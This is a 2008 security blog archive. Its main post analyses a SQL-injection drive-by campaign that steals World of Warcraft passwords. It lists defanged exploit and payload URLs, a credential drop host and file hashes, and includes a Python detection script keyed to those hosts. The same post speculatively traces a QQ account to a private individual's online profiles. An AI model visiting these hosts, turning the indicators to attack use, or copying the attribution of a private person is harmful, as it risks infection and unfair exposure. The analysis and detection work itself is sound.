Archive for November, 2008

Nov 10 2008

Chinese hackers will do anything for your WoW password (updated)

Trojan Horse

So the Analyst’s Diary blog at viruslist.com has an article on a new mass SQL injection attack that injects redirects to browser exploits into .asp pages. The exploits drop one of two trojans that steal passwords and whatnot. Here is h.js:

document.write("");
document.write("");

WordPress won’t display the script. Basically, it writes iframes that point to two separate URLs (these URLs host browser exploits, so don’t follow them):

hxxp://vvexe.com/haha/index.html and
hxxp://www.kenya.com/faq.htm

I can’t seem to get to either of these sites at the moment. I’ll try again later.

Update: I spent some time looking at this malware. The two pages listed earlier in this post contain iframes to browser plug-in exploits for RealPlayer and other typical vulnerabilities. The exploits attempt to load and run down.exe (e160f590d894a98474697ac0db987746, not packed, Delphi code), which in turn downloads hxxp://www.vvexe.com/haha/down.txt to get the additional files 1.exe (a7fc8c966fdeb550fe19aba3169569be, not packed, VC++), do.exe (5af5edaa2cebf1fed56ad36799b2c850) and cool.exe (18867d6de1a3a9241c14c22c19b51351, not packed, Delphi).

1.exe is a WoW trojan that waits for passwords sent to grunt.wowchina.com and [kr|us|tw|eu].[version|logon].worldofwarcraft.com. It also looks for and attempts to disable many types of security software. It attempts to send the stolen credentials to an ASP page on www.yilu777.com.
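The chain above gives a defender three things to look for: injected off-site or hidden includes on your own .asp pages (including ones assembled through `document.write`, as h.js does), the four file hashes, and outbound requests to the hosts named in the post. The script below is an added example, not code from the original post or from the viruslist.com write-up. The hostnames and MD5s are the ones listed above; the sample page, the trusted-host list, the `receiver.asp` path and the proxy log lines are constructed for illustration.

```python
"""Triage helpers for the .asp injection chain described in the post.

Added example, not code from the original post or from viruslist.com.
Hosts and MD5 hashes come from the post; the sample page, the trusted-host
list and the proxy log lines are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Hosts named in the post (written "hxxp" there to defang the links).
KNOWN_HOSTS = {"vvexe.com", "www.vvexe.com", "www.kenya.com", "www.yilu777.com"}

# MD5 hashes of the dropped binaries, as listed in the update.
KNOWN_MD5S = {
    "e160f590d894a98474697ac0db987746": "down.exe",
    "a7fc8c966fdeb550fe19aba3169569be": "1.exe",
    "5af5edaa2cebf1fed56ad36799b2c850": "do.exe",
    "18867d6de1a3a9241c14c22c19b51351": "cool.exe",
}

# Constructed: hosts this site legitimately loads scripts from.
TRUSTED_HOSTS = {"static.example-shop.test"}

# <script src=...> / <iframe src=...>, quoted or unquoted attribute value.
_TAG_RE = re.compile(
    r"<(script|iframe)\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)[^>]*>", re.IGNORECASE
)
# width/height of 0 or 1, or display:none: the usual hidden drive-by frame.
_HIDDEN_RE = re.compile(
    r"(width|height)\s*=\s*['\"]?[01]\b|display\s*:\s*none", re.IGNORECASE
)


def find_suspicious_includes(html, trusted_hosts):
    """Return (tag, url, reasons) for includes that should not be on the page.

    Simple JS string escapes are undone first so that tags emitted through
    document.write("...") are inspected like ordinary markup.
    """
    html = html.replace("\\/", "/").replace('\\"', '"')
    findings = []
    for m in _TAG_RE.finditer(html):
        tag, url = m.group(1).lower(), m.group(2)
        host = urlparse(url).hostname
        if host is None:  # relative URL: same-origin, not an external include
            continue
        host = host.lower()
        reasons = []
        if host in KNOWN_HOSTS:
            reasons.append("known malicious host")
        elif host not in trusted_hosts:
            reasons.append("off-site include")
        if tag == "iframe" and _HIDDEN_RE.search(m.group(0)):
            reasons.append("hidden iframe")
        if reasons:
            findings.append((tag, url, ", ".join(reasons)))
    return findings


def label_known_hash(md5hex):
    """Map an MD5 hex digest to the sample name from the post, or None."""
    return KNOWN_MD5S.get(md5hex.strip().lower())


def find_c2_requests(log_lines):
    """Return proxy log lines whose request URL targets a host from the post."""
    hits = []
    for line in log_lines:
        m = re.search(r"https?://([^/\s:]+)", line)
        if m and m.group(1).lower() in KNOWN_HOSTS:
            hits.append(line)
    return hits


# Constructed sample page: one injected document.write iframe (as in h.js),
# one plain hidden iframe, one unapproved third-party script.
SAMPLE_PAGE = """<html><body><h1>Store</h1>
<script src="/js/site.js"></script>
<script src="http://static.example-shop.test/cart.js"></script>
<script src="http://cdn.thirdparty.test/a.js"></script>
<script>document.write("<iframe src=\\"http://vvexe.com/haha/index.html\\" width=0 height=0></iframe>");</script>
<iframe src="http://www.kenya.com/faq.htm" style="display:none"></iframe>
</body></html>"""

# Constructed squid-style proxy lines; the .asp path is a placeholder,
# the post does not name it.
SAMPLE_PROXY_LOG = [
    "1226301234.567 213 10.0.0.15 TCP_MISS/200 4120 GET http://www.example-shop.test/ - DIRECT/198.51.100.7 text/html",
    "1226301240.101 88 10.0.0.15 TCP_MISS/200 312 GET http://www.vvexe.com/haha/down.txt - DIRECT/203.0.113.9 text/plain",
    "1226301300.009 45 10.0.0.15 TCP_MISS/200 0 POST http://www.yilu777.com/receiver.asp - DIRECT/203.0.113.10 text/html",
]

if __name__ == "__main__":
    for finding in find_suspicious_includes(SAMPLE_PAGE, TRUSTED_HOSTS):
        print("include:", finding)
    for line in find_c2_requests(SAMPLE_PROXY_LOG):
        print("c2 traffic:", line)
    print("hash match:", label_known_hash("e160f590d894a98474697ac0db987746"))
```

Run it against your own page templates and proxy logs; the regexes are deliberately loose (unquoted attributes, case-insensitive) because injected markup is rarely tidy, and the hidden-frame heuristic is what distinguishes a drive-by redirect from a legitimate embed.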

do.exe is a little more interesting. It appears to be a generic remote access trojan that sends a beacon to QQ number 58836533. A quick search for that QQ number revealed that this person’s Paipai account has been frozen:

http://shop.paipai.com/58836533

So I did some more digging and found the QQ profile with a name and nick:

Searching for the nickname got me to a few blogs and profiles that had some young girl who is really into anime. Maybe her QQ account got pwn3d or maybe, just maybe she is a member of “China Girl Security”. I tried to get an add on that QQ account so I could talk to the hacker but didn’t have any luck.

Note to Chinese hackers: Please pay the tax on your WoW gold profits.

Nov 08 2008

How to smuggle a train

Published by Heike under Uncategorized

Saw this picture on a Chinese hacker website and wanted to share it.  Pakistan Sunni Muslims return from religious congregation in Multan.

Nov 08 2008

Fake Wordpress 2.6.4 Update

Published by Heike under Uncategorized

We run WordPress here at TDV and wanted to make sure others had seen this alert on a fake 2.6.4 update:

Can you find five differences between these two sites? Wordpresz.org may indeed look like WordPress.org, but the 2.6.4 release it’s distributing is purposely backdoored in order to steal the content of cookies from those who have installed it, potentially leading to hijacking of their WordPress blogging platforms for malicious purposes.

Nov 07 2008

Chinese hackers pwn whitehouse (.gov, not the other one)

Published by jumper under US attacks

A Financial Times article discusses multiple security compromises in the White House network. Heike already blogged about how both President-Elect Obama’s and Senator McCain’s campaign networks were compromised by foreign hackers as well. The network of my precinct committee chairperson is next. From the article:

“For a short period of time, they successfully breach a wall, and then you rebuild the wall . . . it is not as if they have continued access,” said the official. “It is constant cat and mouse on this stuff.”

As usual, the article is slim on technical details and fills in the space with general cybersecurity background. At this point, it may be easier to list the government organizations that haven’t been compromised by Chinese hackers.

Nov 06 2008

Chinese hackers cyberattack on Obama and McCain’s campaign networks?

Published by Heike under US attacks

This comes from Newsweek via Wired: both presidential candidates’ campaign networks were compromised. There is a lot of speculation in the original Newsweek article, which Wired duly notes:

Oddly, Newsweek reports that officials at the FBI and White House told the Obama camp that the culprit was a “foreign entity” likely seeking information on the two sides’ policy positions to use in negotiations with the next administration, and that the Obama system had not been hacked by its political opponents.

Nov 04 2008

Chinese hacker authored worm?

Published by Heike under Chinese Malware

From SC Magazine on the new Microsoft worm:

Microsoft rushed out the emergency patch on the 24th October, however the Wecorl worm has now been circulated. Kevin Haley, a director with Symantec’s security response team, claimed that the worm may have originated in China as it appeared to target Chinese language versions of Windows 2000.

Nov 03 2008

China’s use of cyber warfare

Published by Heike under Uncategorized

I haven’t actually had a chance to read the whole article (it’s long) but did a quick scan and it looks worthwhile. It opens with background on the PLA’s current capabilities and then gets into the cyber warfare section.

Nov 01 2008

Chinese advance-fee scam via Skype

Thanks to Websense Security Labs for informing us about a new advance-fee scam targeting Chinese Skype users. Apparently, Chinese users get a message indicating that they have won a significant sum of money and prizes. They are directed to a phishing website where they fill out contact information for the prizes, nothing too suspicious so far. Finally, they are redirected to a bank transfer page where they have to send in a fee of several hundred RMB to collect the prize. I wonder if the officials reading Tom Skype users’ messages are falling for this too.
